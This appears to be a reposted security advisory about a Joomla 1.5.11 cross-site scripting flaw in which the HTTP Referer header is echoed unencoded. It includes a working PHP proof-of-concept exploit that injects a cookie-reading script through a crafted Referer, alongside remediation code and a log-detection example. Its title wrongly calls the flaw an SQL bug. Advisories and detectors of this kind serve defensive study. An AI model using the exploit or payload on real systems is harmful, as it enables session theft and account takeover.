New SQL Bug
Posted 5 August 2009, 11:56 AM
Vulnerable Systems:
 * Joomla! version 1.5.11 and prior

Immune Systems:
 * Joomla! version 1.5.12

HTTP headers are not properly sanitized, specifically the HTTP_REFERER variable, which is written into the page without encoding.
An attacker can exploit the vulnerability to inject DHTML and JavaScript code in the context of the web browser. This may lead to theft of the targeted user's cookies and to gaining access to the user's account, including administrator privileges.

Snippet of vulnerable code:

Line 225 of file components/com_content/views/article/tmpl/form.php is vulnerable.

221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo $this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo $this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo $this->article->created_by; ?>" />
225 <input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />
226
227 <input type="hidden" name="task" value="" />
228 </form>

Other parts of the code may be affected:

components/com_user/controller.php:86: $return = @$_SERVER['HTTP_REFERER'];
plugins/system/legacy/html.php:246: echo '<a href="'. $_SERVER['HTTP_REFERER'] .'"><span class="small">'. JText::_( 'BACK' ) .'</span></a>';
templates/beez/html/com_content/article/form.php:186: <input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />
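The attribute breakout and its remedy, as an added illustration in PHP that is neither Joomla's own code nor the 1.5.12 patch: the raw echo pattern from the snippets above is placed beside an output-encoded version, and a small return-URL check covers the com_user/controller.php case, where the header is reused as a redirect target. The function names, the sample Referer values and the host name www.example.org are constructed for this example.

```php
<?php
// Added illustration (not Joomla code): why echoing HTTP_REFERER into a
// double-quoted attribute is XSS, and what encoding does to the same input.

// Constructed Referer value shaped like the attribute-breakout payload the advisory describes.
$referer = '"><script>alert(document.cookie)</script><span a="';

// Vulnerable pattern (mirrors templates/beez/html/com_content/article/form.php:186):
// the header value is concatenated raw into value="...".
function hiddenRefererVulnerable(string $referer): string
{
    return '<input type="hidden" name="referer" value="' . $referer . '" />';
}

// Hardened pattern (illustrative fix): encode quotes, angle brackets and ampersands so
// the value can neither terminate the attribute nor open a tag.
function hiddenRefererSafe(string $referer): string
{
    $escaped = htmlspecialchars($referer, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="referer" value="' . $escaped . '" />';
}

// For the redirect case (components/com_user/controller.php:86 takes the header as a
// return URL), accept only a site-relative path or an http(s) URL on our own host.
function safeReturnUrl(?string $referer, string $siteHost, string $fallback = '/index.php'): string
{
    if ($referer === null || $referer === '') {
        return $fallback;
    }
    $parts = parse_url($referer);
    if ($parts === false) {
        return $fallback;
    }
    if (!isset($parts['host'])) {
        // Relative form: no scheme, no backslashes, exactly one leading slash
        // (a leading "//" would be a protocol-relative URL pointing at another host).
        $path = $parts['path'] ?? '';
        $relative = !isset($parts['scheme'])
            && strpos($referer, '\\') === false
            && strlen($path) > 0 && $path[0] === '/'
            && (strlen($path) < 2 || $path[1] !== '/');
        return $relative ? $referer : $fallback;
    }
    $scheme = strtolower($parts['scheme'] ?? 'http');
    if (!in_array($scheme, ['http', 'https'], true) || strcasecmp($parts['host'], $siteHost) !== 0) {
        return $fallback;
    }
    return $referer;
}

echo "Vulnerable: " . hiddenRefererVulnerable($referer) . "\n";
echo "Hardened:   " . hiddenRefererSafe($referer) . "\n";

// Constructed redirect candidates: only the first two are accepted.
foreach ([
    '/index.php?option=com_content&view=article&id=3',
    'https://www.example.org/index.php',
    'http://attacker.invalid/steal',
    '//attacker.invalid/steal',
    'javascript:alert(1)',
] as $candidate) {
    printf("%-50s -> %s\n", $candidate, safeReturnUrl($candidate, 'www.example.org'));
}
```

The hardened output renders the payload as `&quot;&gt;&lt;script&gt;...`, which the browser displays as text inside the attribute rather than parsing as markup; the allow-list in safeReturnUrl closes the companion problem of an attacker-supplied Referer becoming the page the user is sent to after login.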


An attacker can redirect the victim to a site with this script and execute JavaScript code in the victim's browser. The PoC creates a crafted HTTP request with malicious data in the HTTP_REFERER header.
In order to successfully exploit it, an account with any role is needed. For example, a user with any role can escalate privileges to administrator.
<?php

/* PoC: XSS Joomla 1.5.11
Juan Galiana Lara
Internet Security Auditors
Jun 2009
*/

/* config */
$site='localhost';
$path='/joomla-1.5.11';
$cookname='d85558a8cf943386aaa374896bfd3d99';
$cookvalue='4ab56fdd83bcad86289726aead602699';

class cURL {
var $headers;
var $user_agent;
var $compression;
var $cookie_file;
var $cookies;
var $proxy;
/* evil script */
var $xss='alert("PWN PWN PWN: " + document.cookie);';

/* constructor (PHP 5 style; the original used the PHP 4 class-name constructor) */
function __construct($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {
$this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$this->headers[] = 'Connection: Keep-Alive';
$this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
/* the Referer value closes the value="..." attribute of the hidden input and adds a script tag */
$this->headers[] = 'Referer: "><script>' . $this->xss .'</script><span a="';
$this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
$this->compression=$compression;
$this->proxy=$proxy;
$this->cookies=$cookies;
if ($this->cookies == TRUE) $this->cookie($cookie);
}

/* use an existing cookie jar, or create an empty one */
function cookie($cookie_file) {
if (file_exists($cookie_file)) {
$this->cookie_file=$cookie_file;
} else {
$f = fopen($cookie_file,'w') or $this->error('The cookie file could not be opened. Check permissions');
$this->cookie_file=$cookie_file;
fclose($f);
}
}

/* send the GET request with the crafted headers and return the response body */
function get($url) {
$process = curl_init($url);
curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
curl_setopt($process, CURLOPT_HEADER, 0);
curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEFILE, $this->cookie_file);
if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEJAR, $this->cookie_file);
curl_setopt($process,CURLOPT_ENCODING , $this->compression);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
if ($this->proxy) curl_setopt($process, CURLOPT_PROXY, $this->proxy);
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
curl_close($process);
return $return;
}

function error($error) {
echo $error;
die;
}
}

/* set cookie (Netscape cookie-jar format: domain, flag, path, secure, expiry, name, value) */
$f=fopen("cookies.txt","w");
fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n");
fclose($f);

/* do request */
$cc = new cURL();
$c=$cc->get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form');

/* let's execute some javascript.. }:-)*/
echo $c;
?>
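Because the payload travels in the Referer header, a request of this kind also leaves a distinctive trace in the web server's access log. The following detection logic over Apache combined-format log lines is an added example in PHP and is not part of the original post; the log lines, IP addresses, timestamps and function names are constructed for the illustration.

```php
<?php
// Added example (not from the original post): flag access-log entries whose
// Referer carries attribute-breakout characters instead of a browser-made URL.
// Constructed lines in Apache "combined" format; Apache logs a literal quote
// inside a header value as \" and other non-printables as \xHH.

$logLines = <<<'LOG'
203.0.113.5 - - [05/Aug/2009:11:56:01 +0700] "GET /joomla-1.5.11/index.php?option=com_content&view=article&layout=form HTTP/1.1" 200 5120 "\"><script>alert(document.cookie)</script><span a=\"" "Mozilla/4.0 (compatible; MSIE 7.0)"
198.51.100.7 - - [05/Aug/2009:11:57:12 +0700] "GET /joomla-1.5.11/index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 8800 "http://localhost/joomla-1.5.11/index.php" "Mozilla/5.0"
192.0.2.9 - - [05/Aug/2009:11:58:40 +0700] "GET /joomla-1.5.11/index.php?option=com_user&view=login HTTP/1.1" 200 3000 "-" "curl/7.19"
LOG;

// Parse one combined-format line. Quoted fields may contain backslash-escaped
// quotes, so each quoted field is matched as (non-quote-non-backslash | backslash+any)*.
function parseCombinedLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\\\]|\\\\.)*)" (\d{3}) (\S+) "((?:[^"\\\\]|\\\\.)*)" "((?:[^"\\\\]|\\\\.)*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'ip'      => $m[1],
        'time'    => $m[2],
        'request' => stripcslashes($m[3]),
        'status'  => (int) $m[4],
        'referer' => stripcslashes($m[6]),
        'agent'   => stripcslashes($m[7]),
    ];
}

// A browser-generated Referer is an absolute http(s) URL in which quotes and
// angle brackets are percent-encoded. A raw ", ', < or > (or no URL shape at
// all) therefore indicates a hand-crafted header aimed at a reflection point
// such as the hidden "referer" input in form.php.
function refererLooksInjected(string $referer): bool
{
    if ($referer === '-' || $referer === '') {
        return false;                      // no Referer sent
    }
    if (preg_match('/["\'<>]/', $referer)) {
        return true;                       // attribute/tag breakout characters
    }
    return !preg_match('#^https?://#i', $referer);
}

// Return the parsed entries whose Referer fails the check above.
function findInjectedReferers(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parseCombinedLine($line);
        if ($entry !== null && refererLooksInjected($entry['referer'])) {
            $hits[] = $entry;
        }
    }
    return $hits;
}

// Only the first constructed line is reported.
foreach (findInjectedReferers($logLines) as $hit) {
    printf("%s [%s] %s\n  suspicious Referer: %s\n",
        $hit['ip'], $hit['time'], $hit['request'], $hit['referer']);
}
```

On the constructed input only the first line is flagged; the second carries an ordinary URL and the third has no Referer at all. Pairing the hit with the requested URL (the article form that reflects the header) is what separates a probe against this bug from unrelated noise.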
Category: Hacking | Added by: SikuruZ